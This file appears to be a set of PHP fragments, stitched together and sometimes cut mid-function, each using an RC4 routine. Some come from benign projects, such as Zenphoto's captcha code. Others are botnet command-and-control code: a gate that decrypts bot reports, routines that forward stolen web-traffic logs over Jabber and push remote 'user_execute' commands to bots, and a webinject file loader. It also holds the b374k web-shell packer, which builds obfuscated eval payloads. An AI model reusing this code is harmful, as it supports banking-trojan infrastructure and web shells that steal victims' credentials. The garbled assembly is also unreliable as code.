function get_post()
{
$post = fix_magic_quote($_POST);
if (empty($_FILES) && is_ajax()) {
$post_str = rc4($GLOBALS['cipher_key'], hex2bin($post['target']));
parse_str($post_str, $post);
$post = fix_magic_quote($post);
}
return $post;
}
function z($d, $p = false, $m = false)
{
/*RC4 implementation*/
if (!function_exists('rc4')) {
function rc4($d, $p)
{
if (!$p) {
return $d;
}
$a = array();
$j = 0;
for ($i = 0; $i < 256; $i++) {
$a[$i] = $i;
}
for ($i = 0; $i < 256; $i++) {
$j = ($j + $a[$i] + ord($p[$i % strlen($p)])) % 256;
$z = $a[$i];
$a[$i] = $a[$j];
$a[$j] = $z;
}
$i = $j = 0;
for ($y = 0; $y < strlen($d); $y++) {
$i = ($i + 1) % 256;
$j = ($j + $a[$i]) % 256;
$z = $a[$i];
$a[$i] = $a[$j];
$a[$j] = 0 + $z;
@($R .= $d[$y] ^ chr($a[($a[$i] + $a[$j]) % 256]));
}
return $R;
}
}
$a = array(json_decode('"\\u200c"'), json_decode('"\\u200d"'), !is_bool($m) ? $m[0] : json_decode('"\\u2589"'));
$A = str_repeat($a[0], 32) . str_repeat($a[1], 32);
if (@$m[1] && mb_substr_count($d, $m[1]) % 2 == 0) {
//parts-mode
return preg_replace_callback("#\\{$m[1]}([\\x{0000}-\\x{ffff}]+?)\\{$m[1]}#ums", function ($_) use($A, $p, $m) {
return $A . z($_[1], $p ? $p : !1, $m[0]);
}, preg_replace("#\\{$m[1]}{2}#ums", '', $d));
}
if ($m) {
$m = preg_replace('# {2,}#ms', ' ', preg_replace('#[^ \\t\\n]#ums', $a[2], html_entity_decode('' . strip_tags($d), !1, 'UTF-8')));
}
$d = rc4("ÿÿÿÿ" . preg_replace_callback('#[\\x{0100}-\\x{ffff}]#u', function ($_) {
return '&#' . hexdec(json_encode($_[0])) . ';';
}, $d), $p);
for ($j = 0; $j < strlen($d); $j++) {
@($z .= str_replace(array(0, 1), $a, str_pad(decbin(ord($d[$j])), 8, '0', STR_PAD_LEFT)));
}
return ($m ? $a[2] : '') . $z . @mb_substr($m, 1);
}
function respond($o, $encr = NULL)
{
global $config;
header('Content-Type: text/plain');
$o = is_string($o) ? $o : json_encode($o);
if ($encr === TRUE || $encr === NULL && $config['encrypt']) {
$a = str_split(uniqid());
shuffle($a);
$a = sha1(implode('', $a));
$k =& $_SESSION['key1'];
$o = '!:' . bin2hex(rc4($k, '!:' . $a . "\n" . $o));
$_SESSION['key2'] = $k;
$k = $a;
}
exit($o);
}
function rc4decrypt($data, $box)
{
global $config;
return substr(rc4($data, rc4Init($box)), $config['rc4drop']);
}
function imNotify(&$type, &$list, &$botId, $defloration = false, $wentOnline = false)
{
if (empty($GLOBALS['config']['reports_jn_to'])) {
return;
}
$messages = array();
# Notify of new matching BotIDs
if ($defloration) {
$ml = explode("", $GLOBALS['config']['reports_jn_botmasks']);
foreach ($ml as $mask) {
if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) {
$messages[] = "Reason: botId matched\nBot ID: {$botId}\n";
break;
}
}
}
# Notify of matching BotIDs went online
if ($wentOnline) {
$ml = explode("", $GLOBALS['config']['reports_jn_masks']['wentOnline']);
foreach ($ml as $mask) {
if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) {
$messages[] = "Reason: botId is online\nBot ID: {$botId}\n";
break;
}
}
}
# Notify of matching report URLs
if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) {
$ml = explode("", $GLOBALS['config']['reports_jn_list']);
foreach ($ml as $mask) {
if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) {
$messages[] = "Reason: URL matched\nBot ID: {$botId}\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024);
break;
}
}
}
# Notify of matching report contexts by type
# NOTE: these reports are not presented in full! Only some lines around the keyword
if (!empty($list[SBCID_BOTLOG])) {
$report_match = array(BLT_ANALYTICS_SOFTWARE => array('software', 'Software matched'), BLT_COMMANDLINE_RESULT => array('cmd', 'Command line result matched'));
foreach ($report_match as $rm_type => $rm) {
if ($type == $rm_type) {
$ml = explode("", $GLOBALS['config']['reports_jn_masks'][$rm[0]]);
$reason = $rm[1];
foreach (array_filter(array_map('trim', $ml), 'strlen') as $mask) {
if (@preg_match('#' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '#i', $list[SBCID_BOTLOG], $m, PREG_OFFSET_CAPTURE) > 0) {
# Extract a few lines around the match
$surrounding_lines = 2;
$match_pos = $m[0][1];
# offset of the match
$n_pos = array(0);
# array of \n offsets
$p = 0;
# current offset
$p_past_npos = false;
# are we past the match?
while (FALSE !== ($p = strpos($list[SBCID_BOTLOG], "\n", $p))) {
# all \n-s
$n_pos[] = $p;
# add it
if ($p > $match_pos) {
$p_past_npos = true;
}
if (!$p_past_npos && count($n_pos) > $surrounding_lines + 1) {
# don't keep more than N \n-s
array_shift($n_pos);
}
if ($p_past_npos && count($n_pos) >= ($surrounding_lines + 1) * 2) {
# stop a few lines past the match
break;
}
$p++;
}
$p_from = array_shift($n_pos);
$p_till = array_pop($n_pos);
$message_part = trim(substr($list[SBCID_BOTLOG], $p_from, $p_till - $p_from));
$messages[] = "Reason: {$reason}\nBot ID: {$botId}\n\n" . $message_part;
break;
}
}
}
}
}
# Notify
if (empty($messages)) {
return;
}
foreach ($messages as $message) {
GateLog::get()->log(GateLog::L_TRACE, 'Jabber', sprintf("Notify %s : %s", $GLOBALS['config']['reports_jn_to'], $message));
}
jabber_notify($GLOBALS['config']['reports_jn_to'], $messages);
# Execute scripts, if set
global $country_allowed;
if ($country_allowed && strlen($GLOBALS['config']['reports_jn_script']) > 0) {
$eid = md5(microtime(), true);
$script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f';
$size = strlen($eid) + strlen($script);
$replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script;
$replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData;
visualEncrypt($replyData);
rc4($replyData, $GLOBALS['globalKey']);
echo $replyData;
die;
}
}
function decrypt($r)
{
$data = $r;
rc4($data, rc4Init('secret'));
return $data;
}
function decrypt($info, $encrypt_enable, $encrypt_pass, $encrypt_type)
{
if ($encrypt_enable) {
if ($encrypt_type === "AES") {
require_once "aes.php";
$info = AESDecryptCtr($info, $encrypt_pass);
} else {
require_once "rc4.php";
$info = rc4(base64_decode($info), $encrypt_pass);
}
} else {
$info = base64_decode($info);
}
return $info;
}
function decrypt_data($data, $key)
{
$data = rc4($key, hex2bin($data));
$data = json_from_string($data);
if (!$data) {
return false;
}
if (!isset($data['data']) || empty($data['data'])) {
return false;
}
return $data['data'];
}
function decrypt($ciphertext)
{
return rc4(base64_decode($ciphertext), $this->encryption_key);
}
function loadfile($file)
{
$cipher = false;
if (strncmp($file, $s = 'webinjects-', $l = strlen($s)) === 0) {
# (slash issue) Bot does not like slashes in the filename. We'll simulate with a constant prefix
$filename = './files/webinjects/' . substr(basename($file), 0, $l);
$cipher = true;
} elseif (strncmp($file, $s = 'webinjects/', $l = strlen($s)) === 0) {
$filename = './files/webinjects/' . basename($file);
$cipher = true;
} else {
$filename = './files/' . basename($file);
}
if (!is_file($filename)) {
return false;
}
$len = filesize($filename);
$file_extension = strtolower(substr(strrchr($filename, "."), 1));
header("Cache-Control:");
header("Cache-Control: public");
header("Content-Type: application/octet-stream");
if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) {
$iefilename = preg_replace('/\\./', '%2e', $filename, substr_count($filename, '.') - 1);
header("Content-Disposition: attachment; filename=\"{$iefilename}\"");
} else {
header("Content-Disposition: attachment; filename=\"{$filename}\"");
}
header('Content-Transfer-Encoding: binary');
header("Content-Length: " . $len);
@ob_clean();
flush();
if (!$cipher) {
@readfile("{$filename}");
} else {
$contents = file_get_contents($filename);
rc4($contents, $GLOBALS['config']['botnet_cryptkey_bin']);
echo $contents;
}
return true;
}
function imNotify(&$type, &$list, &$botId)
{
if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) {
$ml = explode("", $GLOBALS['config']['reports_jn_list']);
foreach ($ml as &$mask) {
if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) {
$message = htmlentities("Bot ID: " . $botId . "\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024));
error_reporting(0);
if (strlen($GLOBALS['config']['reports_jn_logfile']) > 0 && ($fh = @fopen($GLOBALS['config']['reports_jn_logfile'], 'at')) !== false) {
@fwrite($fh, $message . "\n\n" . str_repeat('=', 40) . "\n\n");
@fclose($fh);
}
require_once "system/jabberclass.php";
$jab = new Jabber();
$jab->server = $GLOBALS['config']['reports_jn_server'];
$jab->port = $GLOBALS['config']['reports_jn_port'];
$jab->username = $GLOBALS['config']['reports_jn_account'];
$jab->password = $GLOBALS['config']['reports_jn_pass'];
if ($jab->connect()) {
$jab->sendAuth();
$jab->sendPresence(NULL, NULL, "online");
$jab->sendMessage($GLOBALS['config']['reports_jn_to'], "normal", NULL, array("body" => $message));
$jab->disconnect();
}
if (strlen($GLOBALS['config']['reports_jn_script']) > 0) {
$eid = md5($mask, true);
$script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f';
$size = strlen($eid) + strlen($script);
$replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script;
$replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData;
visualEncrypt($replyData);
rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']);
echo $replyData;
die;
}
break;
}
}
}
}
/**
* generates a simple captcha
*
* @return array;
*/
function getCaptcha($prompt = NULL)
{
global $_zp_HTML_cache;
$_zp_HTML_cache->disable();
$captcha_len = getOption('zenphoto_captcha_length');
$key = $this->getCaptchaKey();
$lettre = getOption('zenphoto_captcha_string');
$numlettre = strlen($lettre) - 1;
$string = '';
for ($i = 0; $i < $captcha_len; $i++) {
$string .= $lettre[rand(0, $numlettre)];
}
$cypher = bin2hex(rc4($key, $string));
$code = sha1($cypher);
query('DELETE FROM ' . prefix('captcha') . ' WHERE `ptime`<' . (time() - 3600), false);
// expired tickets
query("INSERT INTO " . prefix('captcha') . " (ptime, hash) VALUES (" . db_quote(time()) . "," . db_quote($code) . ")", false);
$html = '<label for="code" class="captcha_label">' . $prompt . '</label><img id="captcha" src="' . WEBPATH . '/' . ZENFOLDER . '/' . PLUGIN_FOLDER . '/zpCaptcha/c.php?i=' . $cypher . '" alt="Code" />';
$input = '<input type="text" id="code" name="code" class="captchainputbox" />';
$hidden = '<input type="hidden" name="code_h" value="' . $code . '" />';
return array('input' => $input, 'html' => $html, 'hidden' => $hidden);
}
function crypto_unserialize($data)
{
return unserialize(base64_decode(rc4($data, WorkbenchConfig::get()->value("rc4Secret"), false)));
}
function sAjax($i)
{
global $config;
exit(base64_encode(rc4($i, rc4Init($config['sPass']))));
}
$s[$j] = $x;
$t = chr($s[($s[$i] + $s[$j]) % 256]);
if ($t == $str[$y]) {
$res .= chr(ord($str[$y]));
} else {
$res .= $t ^ $str[$y];
}
}
return $res;
}
if (isset($_POST['pd']) || isset($_POST['SESSION'])) {
if (isset($_POST['pd'])) {
$client = 0;
$b64Data = str_replace($GOODCHAR, $BADCHAR, $_POST['pd']);
$pEncData = base64_decode($b64Data);
$pData = rc4($pEncData, $ENCKEY);
} else {
if (isset($_POST['SESSION'])) {
$client = 1;
$b64Data = str_replace($GOODCHAR, $BADCHAR, $_POST['SESSION']);
$pEncData = base64_decode($b64Data);
$pData = $pEncData;
}
}
parse_str($pData, $POST);
foreach ($POST as $key => $value) {
//print "\nOld Value: " . $value;
$POST[$key] = str_replace($GOODCHAR, $BADCHAR, $value);
//print "\nNew Value: " . $POST[$key];
}
if (isset($POST['enc'])) {
function sendEmptyReply()
{
$replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1) . "J�6�K��y�u.#H�";
visualEncrypt($replyData);
rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']);
echo $replyData;
die;
}
define('__REPORT__', 1);
require_once 'system/global.php';
require_once 'system/config.php';
define('BOTCRYPT_MAX_SIZE', 409600);
if (@$_SERVER['REQUEST_METHOD'] !== 'POST') {
die(function_exists('e404plugin_display') ? e404plugin_display() : die404('Not found'));
}
//Получаем данные.
$data = @file_get_contents('php://input');
$dataSize = @strlen($data);
if ($dataSize < HEADER_SIZE + ITEM_HEADER_SIZE) {
die;
}
if ($dataSize < BOTCRYPT_MAX_SIZE) {
rc4($data, $config['botnet_cryptkey_bin']);
}
visualDecrypt($data);
//Верефикация. Если совпадает MD5, нет смысла проверять, что-то еще.
if (strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0) {
die;
}
//Парсим данные (Сжатие данных не поддерживается).
$list = array();
for ($i = HEADER_SIZE; $i + ITEM_HEADER_SIZE <= $dataSize;) {
$k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE));
$list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);
$i += ITEM_HEADER_SIZE + $k[3];
}
unset($data);
//Основные параметры, которые должны быть всегда.
function packer_b374k($output, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password)
{
$content = "";
if (is_file($output)) {
if (!is_writable($output)) {
return "error : file " . $output . " exists and is not writable{[|b374k|]}";
}
}
if (!empty($password)) {
$password = "******"" . sha1(md5($password)) . "\"; // sha1(md5(pass))\n";
}
$cipher_key = "\$GLOBALS['cipher_key'] = \"" . $GLOBALS['cipher_key'] . "\";";
$compress_level = (int) $compress_level;
if ($compress_level < 0) {
$compress_level = 0;
} elseif ($compress_level > 9) {
$compress_level = 9;
}
$version = "";
if (preg_match("/\\\$GLOBALS\\['ver'\\]\\ *=\\ *[\"']+([^\"']+)[\"']+/", $phpcode, $r)) {
$version = $r[1];
}
$header = "<?php\n";
$rc4_function = $compress == "rc4" ? 'function rc4($a,$b){$c=array();for($d=0;$d<256;$d++){$c[$d]=$d;}$e=0;for($d=0;$d<256;$d++){$e=($e+$c[$d]+ord($a[$d%strlen($a)]))%256;$f=$c[$d];$c[$d]=$c[$e];$c[$e]=$f;}$d=0;$e=0;$g="";for($h=0;$h<strlen($b);$h++){$d=($d+1)%256;$e=($e+$c[$d])%256;$f=$c[$d];$c[$d]=$c[$e];$c[$e]=$f;$g.=$b[$h]^chr($c[($c[$d]+$c[$e])%256]);}return $g;}' : '';
if ($strip == 'yes') {
$phpcode = packer_strips($phpcode);
$htmlcode = preg_replace("/(\\ {2,}|\n{2,}|\t+)/", "", $htmlcode);
$htmlcode = preg_replace("/\r/", "", $htmlcode);
$htmlcode = preg_replace("/}\n+/", "}", $htmlcode);
$htmlcode = preg_replace("/\n+}/", "}", $htmlcode);
$htmlcode = preg_replace("/\n+{/", "{", $htmlcode);
$htmlcode = preg_replace("/\n+/", "\n", $htmlcode);
}
$content = $phpcode . $htmlcode;
$content = preg_replace('/^<\\?php/s', '<?php ' . $cipher_key, $content);
if ($compress == 'gzdeflate') {
$content = gzdeflate($content, $compress_level);
$encoder_func = "gz'.'in'.'fla'.'te";
} elseif ($compress == 'gzencode') {
$content = gzencode($content, $compress_level);
$encoder_func = "gz'.'de'.'co'.'de";
} elseif ($compress == 'gzcompress') {
$content = gzcompress($content, $compress_level);
$encoder_func = "gz'.'un'.'com'.'pre'.'ss";
} elseif ($compress == "rc4") {
$content = rc4($GLOBALS['cipher_key'], $content);
$encoder_func = "r" . "c4";
} else {
$encoder_func = "";
}
if ($base64 == 'yes') {
$content = base64_encode($content);
if ($compress != 'no') {
if ($compress == "rc4") {
$encoder = $encoder_func . "(isset(\$_SERVER[\\'HTTP_RC4_KEY\\'])?\$_SERVER[\\'HTTP_RC4_KEY\\']:\\'b374k\\',ba'.'se'.'64'.'_de'.'co'.'de(\$x))";
} else {
$encoder = $encoder_func . "(ba'.'se'.'64'.'_de'.'co'.'de(\$x))";
}
} else {
$encoder = "ba'.'se'.'64'.'_de'.'co'.'de(\"\$x\")";
}
$code = $header . $password . "\$func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on\";\$b374k=\$func('\$x','ev'.'al'.'(\"?>\"." . $encoder . ");');\$b374k(\"" . $content . "\");{$rc4_function}?>";
} else {
if ($compress != 'no') {
$encoder = $encoder_func . "(\$x)";
} else {
$code = $header . $password . "?>" . $content;
$code = preg_replace("/\\?>\\s*<\\?php\\s*/", "", $code);
}
}
if (is_file($output)) {
unlink($output);
}
if (packer_write_file($output, $code)) {
chmod($output, 0777);
return "Succeeded : <a href='" . $output . "' target='_blank'>[ " . $output . " ] Filesize : " . filesize($output) . "</a>{[|b374k|]}" . packer_html_safe(trim($code));
}
return "error{[|b374k|]}";
}
// ignore for logged user
return;
}
$f_user_name = Input::Get('f_user_name');
$f_password = Input::Get('f_password');
$f_login_language = Input::Get('f_login_language', 'string', 'en');
$f_is_encrypted = Input::Get('f_is_encrypted', 'int', '1');
$f_captcha_code = Input::Get('f_captcha_code', 'string', '', true);
$xorkey = camp_session_get('xorkey', '');
if (trim($xorkey) == '') {
return 'xorkey';
}
if (!Input::isValid()) {
return 'userpass';
}
$t_password = rc4($xorkey, base64ToText($f_password));
//
// Valid logins
//
// if user valid, password valid, encrypted, no CAPTCHA -> login
// if user valid, password valid, encrypted, CAPTCHA valid -> login
// if user valid, password valid, not encrypted, no CAPTCHA -> login, upgrade
// if user valid, password valid, not encrypted, CAPTCHA valid -> login, upgrade
//
// Invalid logins
//
// CAPTCHA invalid -> captcha
// If user not valid -> userpass
// password invalid, encrypted -> upgrade
// password invalid, not encrypted -> userpass
if (!$auth->hasIdentity()) {
function updateConfig($updateList)
{
//Пытаемся дать себе права.
$file = defined('FILE_CONFIG') ? FILE_CONFIG : 'system/config.php';
$oldfile = $file . '.old.php';
@chmod(@dirname($file), 0777);
@chmod($file, 0777);
@chmod($oldfile, 0777);
//Удаляем старый файл.
@unlink($oldfile);
//переименовывем текущий конфиг.
if (is_file($file) && !@rename($file, $oldfile)) {
return false;
}
# Defaults
$defaults = config_gefault_values();
# Collect values
$write_config = array();
foreach (array_keys($defaults) as $key) {
if (isset($updateList[$key])) {
$write_config[$key] = $updateList[$key];
} elseif (isset($GLOBALS['config'][$key])) {
$write_config[$key] = $GLOBALS['config'][$key];
} else {
$write_config[$key] = $defaults[$key];
}
}
# Format
# Update the binary cryptkey
$cryptkey_bin = md5(BO_LOGIN_KEY, true);
rc4($cryptkey_bin, rc4Init($write_config['botnet_cryptkey']));
$cryptkey_bin = rc4Init($cryptkey_bin);
$cfgData = "<?php\n\$config = " . var_export($write_config, 1) . ";\n";
$cfgData .= "\$config['botnet_cryptkey_bin'] = array(" . implode(', ', $cryptkey_bin) . ");\n";
$cfgData .= "return \$config;\n";
# Store
if (@file_put_contents($file, $cfgData) !== strlen($cfgData)) {
return false;
}
# Reload
$GLOBALS['config'] = $write_config;
return true;
}
/**
* generates a simple captcha for comments
*
* Thanks to gregb34 who posted the original code
*
* Returns the captcha code string and image URL (via the $image parameter).
*
* @return string;
*/
function generateCaptcha(&$image)
{
$captcha_len = getOption('zenphoto_captcha_length');
$key = $this->getCaptchaKey();
$lettre = getOption('zenphoto_captcha_string');
$numlettre = strlen($lettre) - 1;
$string = '';
for ($i = 0; $i < $captcha_len; $i++) {
$string .= $lettre[rand(0, $numlettre)];
}
$cypher = bin2hex(rc4($key, $string));
$code = sha1($cypher);
query('DELETE FROM ' . prefix('captcha') . ' WHERE `ptime`<' . (time() - 3600), false);
// expired tickets
query("INSERT INTO " . prefix('captcha') . " (ptime, hash) VALUES (" . db_quote(time()) . "," . db_quote($code) . ")", false);
$image = WEBPATH . '/' . ZENFOLDER . "/c.php?i={$cypher}";
return $code;
}
function mta_rc4($data)
{
return rc4('03a976511e2cbe3a7f26808fb7af3c05', $data);
}
function validateTicket($ticket, $user)
{
global $_zp_current_admin_obj;
$admins = $this->getAdministrators();
foreach ($admins as $tuser) {
if ($tuser['user'] == $user) {
if ($tuser['rights'] & USER_RIGHTS) {
$request_date = rc4('ticket' . HASH_SEED, pack("H*", $time = substr($ticket, 0, 20)));
$ticket = substr($ticket, 20);
$ref = sha1($request_date . $user . $tuser['pass']);
if ($ref === $ticket) {
if (time() <= $request_date + 3 * 24 * 60 * 60) {
// limited time offer
$_zp_current_admin_obj = new Zenphoto_Administrator($user, 1);
$_zp_current_admin_obj->reset = true;
}
}
break;
}
}
}
}
/**
*
* Encodes a cookie value tying it to the user IP
* @param $value
*/
function zp_cookieEncode($value)
{
if (IP_TIED_COOKIES) {
return rc4(getUserIP() . HASH_SEED, $value);
} else {
return $value;
}
}
<?php
/**
* creates the captcha images
* @package core
*/
// force UTF-8 Ø
require_once dirname(__FILE__) . '/functions.php';
require_once dirname(__FILE__) . '/lib-encryption.php';
header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
header("Content-type: image/png");
$cypher = preg_replace('/[^0-9a-f]/', '', $_GET['i']);
$key = getOption('zenphoto_captcha_key');
$string = rc4($key, pack("H*", $cypher));
$image = imagecreate(65, 20);
$background = imagecreatefrompng(SERVERPATH . '/' . ZENFOLDER . '/images/captcha_background.png');
imagecopy($image, $background, 0, 0, rand(0, 10), rand(0, 10), 65, 20);
$lettre = imagecolorallocate($image, 5, 5, 5);
$len = strlen($string);
$sz = floor(55 / $len);
$start = rand(2, 55 - $sz * $len);
for ($i = 0; $i < $len; $i++) {
$l = $start + $i * $sz + rand(2, 4);
imagestring($image, 5, $l, rand(0, 3), substr($string, $i, 1), $lettre);
}
$rectangle = imagecolorallocate($image, 48, 57, 85);
ImageRectangle($image, 0, 0, 64, 19, $rectangle);
imagepng($image, NULL, 0);
?>
function decrypt($info)
{
if (ENCRYPT_ENABLE) {
if (ENCRYPT_TYPE === "AES") {
require_once "aes.php";
$info = AESDecryptCtr($info, ENCRYPT_PASS);
} else {
require_once "rc4.php";
$info = rc4(base64_decode($info), ENCRYPT_PASS);
}
} else {
$info = base64_decode($info);
}
return $info;
}
function camp_passwd_decrypt($xorkey, $password)
{
return rc4($xorkey, base64ToText($password));
}
